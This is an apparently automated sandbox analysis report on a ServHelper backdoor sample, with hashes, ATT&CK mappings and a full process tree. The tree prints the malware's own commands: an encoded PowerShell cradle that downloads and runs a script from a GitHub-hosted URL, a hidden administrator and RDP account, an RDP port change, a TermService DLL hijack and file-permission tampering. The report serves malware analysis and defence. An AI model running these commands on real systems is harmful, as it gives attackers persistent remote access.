servhelper | 353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74

Analysis

max time kernel
129s
max time network
120s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 10:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe
Size

6.0MB
MD5

fa8f47009ea5c07fa239e8f98b4a5de1
SHA1

56813df8292edf1d7f4c9c1f9e90b9c722fa238e
SHA256

353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74
SHA512

7df76c27b96774df7a07963d47281d4cd60cb7eaa2d029537f7aa86553c32510bef2166c5bb92a6402e23f497bd5521e124c161866b9bbd1db01991973958551
SSDEEP

49152:DxtmeOhNIWIM/J5mxhIjdvEdnGmol7W3wmAeT7H6O8MO5GfsLPVgyZ7frOMxY6Fj:DzOhN7/D

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
5	2152	powershell.exe
6	2152	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid	Process
1828	icacls.exe
868	icacls.exe
1688	icacls.exe
2812	icacls.exe
1776	takeown.exe
2028	icacls.exe
1144	icacls.exe
2288	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1788
1788

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
1688	icacls.exe
2812	icacls.exe
1776	takeown.exe
2028	icacls.exe
1144	icacls.exe
2288	icacls.exe
1828	icacls.exe
868	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x000b000000015d8c-101.dat	upx
behavioral1/files/0x000c000000015db7-102.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O5E0TK8E0L9JC84NAO28.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
2636	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exepowershell.exeWMIC.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0194294308bda01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1948	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2624	powershell.exe
2432	powershell.exe
2744	powershell.exe
1684	powershell.exe
2624	powershell.exe
2624	powershell.exe
2624	powershell.exe
2152	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid	Process
468
1788
1788
1788
1788

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeRestorePrivilege	1144	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2636	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2636	WMIC.exe
Token: SeAuditPrivilege	2636	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2636	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2636	WMIC.exe
Token: SeAuditPrivilege	2636	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2068	WMIC.exe
Token: SeAuditPrivilege	2068	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2068	WMIC.exe
Token: SeAuditPrivilege	2068	WMIC.exe
Token: SeDebugPrivilege	2152	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	Process	procid_target
PID 2956 wrote to memory of 2624	2956	353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe	28
PID 2956 wrote to memory of 2624	2956	353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe	28
PID 2956 wrote to memory of 2624	2956	353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe	28
PID 2624 wrote to memory of 2440	2624	powershell.exe	30
PID 2624 wrote to memory of 2440	2624	powershell.exe	30
PID 2624 wrote to memory of 2440	2624	powershell.exe	30
PID 2440 wrote to memory of 1324	2440	csc.exe	31
PID 2440 wrote to memory of 1324	2440	csc.exe	31
PID 2440 wrote to memory of 1324	2440	csc.exe	31
PID 2624 wrote to memory of 2432	2624	powershell.exe	32
PID 2624 wrote to memory of 2432	2624	powershell.exe	32
PID 2624 wrote to memory of 2432	2624	powershell.exe	32
PID 2624 wrote to memory of 2744	2624	powershell.exe	34
PID 2624 wrote to memory of 2744	2624	powershell.exe	34
PID 2624 wrote to memory of 2744	2624	powershell.exe	34
PID 2624 wrote to memory of 1684	2624	powershell.exe	36
PID 2624 wrote to memory of 1684	2624	powershell.exe	36
PID 2624 wrote to memory of 1684	2624	powershell.exe	36
PID 2624 wrote to memory of 1776	2624	powershell.exe	39
PID 2624 wrote to memory of 1776	2624	powershell.exe	39
PID 2624 wrote to memory of 1776	2624	powershell.exe	39
PID 2624 wrote to memory of 2028	2624	powershell.exe	40
PID 2624 wrote to memory of 2028	2624	powershell.exe	40
PID 2624 wrote to memory of 2028	2624	powershell.exe	40
PID 2624 wrote to memory of 1144	2624	powershell.exe	41
PID 2624 wrote to memory of 1144	2624	powershell.exe	41
PID 2624 wrote to memory of 1144	2624	powershell.exe	41
PID 2624 wrote to memory of 2288	2624	powershell.exe	42
PID 2624 wrote to memory of 2288	2624	powershell.exe	42
PID 2624 wrote to memory of 2288	2624	powershell.exe	42
PID 2624 wrote to memory of 1828	2624	powershell.exe	43
PID 2624 wrote to memory of 1828	2624	powershell.exe	43
PID 2624 wrote to memory of 1828	2624	powershell.exe	43
PID 2624 wrote to memory of 868	2624	powershell.exe	44
PID 2624 wrote to memory of 868	2624	powershell.exe	44
PID 2624 wrote to memory of 868	2624	powershell.exe	44
PID 2624 wrote to memory of 1688	2624	powershell.exe	45
PID 2624 wrote to memory of 1688	2624	powershell.exe	45
PID 2624 wrote to memory of 1688	2624	powershell.exe	45
PID 2624 wrote to memory of 2812	2624	powershell.exe	46
PID 2624 wrote to memory of 2812	2624	powershell.exe	46
PID 2624 wrote to memory of 2812	2624	powershell.exe	46
PID 2624 wrote to memory of 2820	2624	powershell.exe	47
PID 2624 wrote to memory of 2820	2624	powershell.exe	47
PID 2624 wrote to memory of 2820	2624	powershell.exe	47
PID 2624 wrote to memory of 1948	2624	powershell.exe	48
PID 2624 wrote to memory of 1948	2624	powershell.exe	48
PID 2624 wrote to memory of 1948	2624	powershell.exe	48
PID 2624 wrote to memory of 3056	2624	powershell.exe	49
PID 2624 wrote to memory of 3056	2624	powershell.exe	49
PID 2624 wrote to memory of 3056	2624	powershell.exe	49
PID 2624 wrote to memory of 2056	2624	powershell.exe	50
PID 2624 wrote to memory of 2056	2624	powershell.exe	50
PID 2624 wrote to memory of 2056	2624	powershell.exe	50
PID 2056 wrote to memory of 1068	2056	net.exe	51
PID 2056 wrote to memory of 1068	2056	net.exe	51
PID 2056 wrote to memory of 1068	2056	net.exe	51
PID 2624 wrote to memory of 852	2624	powershell.exe	52
PID 2624 wrote to memory of 852	2624	powershell.exe	52
PID 2624 wrote to memory of 852	2624	powershell.exe	52
PID 852 wrote to memory of 2312	852	cmd.exe	53
PID 852 wrote to memory of 2312	852	cmd.exe	53
PID 852 wrote to memory of 2312	852	cmd.exe	53
PID 2312 wrote to memory of 2316	2312	cmd.exe	54

C:\Users\Admin\AppData\Local\Temp\353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe
"C:\Users\Admin\AppData\Local\Temp\353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e7pp6uze.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2440
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A58.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6A47.tmp"
      4⤵
      PID:1324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1776
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2028
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1144
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2288
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1828
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:868
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1688
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2812
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2820
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1948
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:3056
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1068
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:852
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2312
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2316
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1556
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:684
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1000
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:1932
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1384
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1652
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:340

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1880
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:1104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1480

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc S6wdSlHf /add
1⤵
PID:1100
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc S6wdSlHf /add
  2⤵
  PID:2344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc S6wdSlHf /add
    3⤵
    PID:960

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:620
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:3048

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD
1⤵
PID:1476
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD
  2⤵
  PID:2964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD
    3⤵
    PID:2032

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2780
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:908

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc S6wdSlHf
1⤵
PID:2148
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc S6wdSlHf
  2⤵
  PID:1700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc S6wdSlHf
    3⤵
    PID:1596

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2264
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2636

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2648
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2068

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2440
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES6A58.tmp

Filesize
1KB

MD5
4be51d8dc5576d2f10d5d063d60925b5

SHA1
e5b9dc2df6b872d035bbe4f779c29c1df93eb5d6

SHA256
bce4e2eb6ba81f19cb54f236c6c116dcd3ff0d992175304705039cb3c137e2c5

SHA512
e1828a051afdf3849da651038180124e08d6bf06017963ea567bcab86940945d1ced831b6dd8b24deb05c3f32329586da524607ab910caf22da0fe62f22b37ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\e7pp6uze.dll

Filesize
3KB

MD5
c0019210cebb1e649eaf61ba756c00ba

SHA1
e3828fd01e34d303bde9423f115e5f2ddace7dc0

SHA256
d92e0a05705d3bd722f386a3a5427508c1bbb795dae981db66497098c99b24ea

SHA512
d547db2d31e09282359c3e9f88898b238b1edd8b353c20f9d734318277d596784de278db2e10247601219ca60008dd781800dd24210d1f00b4444a34e877379d

Download Submit
C:\Users\Admin\AppData\Local\Temp\e7pp6uze.pdb

Filesize
7KB

MD5
e30fdcb4c0ffa48c368652d25b79e97f

SHA1
c82840b19108f97d7b9e45334593b9fd1347b58d

SHA256
cafb6f25d971561bc1ae2d33583d94d0389c030f28565cb3f0505822ecacc5f9

SHA512
c61466ba566bddf050090d942e4462c88d39a493c53ba848e2431b6a42c0a36ef4d86d4d6ed4b7469710110b9cfe24ad5b0a5b0cb6748c6b0bdc71d2dbc8ad2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
4b653b8c50572b3bac76058c88fbfcbc

SHA1
03288b917c0edcc1d31c64f27a41385cb55d45be

SHA256
eae413bb71d8059304690b23fb547af2200f798ef8fb5f95eed6a01da6667254

SHA512
514213ae21006bbbc8e627d35c59380956d3a0f60fd0499161bc447b2e502d84e940e63b699b0fae5a9d090714ffd9fc773ff3fd1e35bde8bb6a3375d4f20454

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
998c361e9d84b207949495156b3dbb0b

SHA1
626a2c2018027ad2a4af17007dd934ab87b31b1f

SHA256
1ad42cb15e27c828ecd25161afdb2e67bc5aff7b9c546f8aff89741e94ea83e7

SHA512
add4a6b1c381d22c7e38a83b6469d0c858f184e561f3f141a51b82840360ea4303d1b6fac7116e290844e442b1da1f7635cfc4650f4e81d8a6d3bb8c12e55695

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6A47.tmp

Filesize
652B

MD5
b08080e69a40a91e3156f07f15244525

SHA1
74fc17d2b52735bd9a14b6df37ab1ccdf3007f20

SHA256
5c8e8109b412805e30e147283fe555d838ebb79042d497b344c9443e6f323ded

SHA512
3ffc166a9b30c16019c0add33d4c45e01d0a3aec4c847c0be1d6e1ef5c15a5779fab46478dcfacf758571984b7a76fe7189d066bd6b47757e10d0ac35504b9fe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e7pp6uze.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e7pp6uze.cmdline

Filesize
309B

MD5
abedf92bf0362b7fd9b1237c72dee79b

SHA1
4c034df9fdf8b36df466bfa18592177061d621e7

SHA256
5f9c8a2d02a4d1772c22974af6ba5a118fc152a62bb81721b457daa5f2165380

SHA512
c0c8d824eda12702dd75a55b12665935a7b66db80d9523a11ecb73f8f0a70087b6a9139afddc2db7ddb43b5008bfc19d835ee591f0a26a945fdfdf4cb7064199

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
0d0f83d5ab9520975fb786cc54f81ec7

SHA1
031e25f9514a1d59cbad1f88ef478fe06c81aa5d

SHA256
e806a0ea2faaf2bcde0c6be4a4d5408845a8281dfd9d6a2e1058b5343d5ee73e

SHA512
67f4fed564955de95d598d8bdff0ce362fbd8936ea75ece00b36a331658b5f11493b22d8566aefcaf33b644741c8a579eba522f23129ba54af8774a0adb98204

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
5381c275c09de4076f00de8b0e323067

SHA1
f5701c9d18ced0eb9c85bbbb390b24b99f0e9938

SHA256
aea5a8b5b709b6d4b4dc492411341d416d02afbd6d9054837051f124163f6702

SHA512
e6765e2cae3e5bbfed7b9924641b4afc2ed4590214a8bf87d01bf995710c036a932edd52d06e5d763f5dd1fe22daee11ede9372dca0946ba4c8d9f8e42179d98

Download Submit
memory/1684-78-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/1684-80-0x00000000025A4000-0x00000000025A7000-memory.dmp

Filesize
12KB

Download
memory/1684-83-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/1684-79-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/1684-77-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/1684-81-0x00000000025AC000-0x0000000002613000-memory.dmp

Filesize
412KB

Download
memory/2152-115-0x0000000001250000-0x00000000012D0000-memory.dmp

Filesize
512KB

Download
memory/2152-116-0x0000000001250000-0x00000000012D0000-memory.dmp

Filesize
512KB

Download
memory/2152-114-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2152-110-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
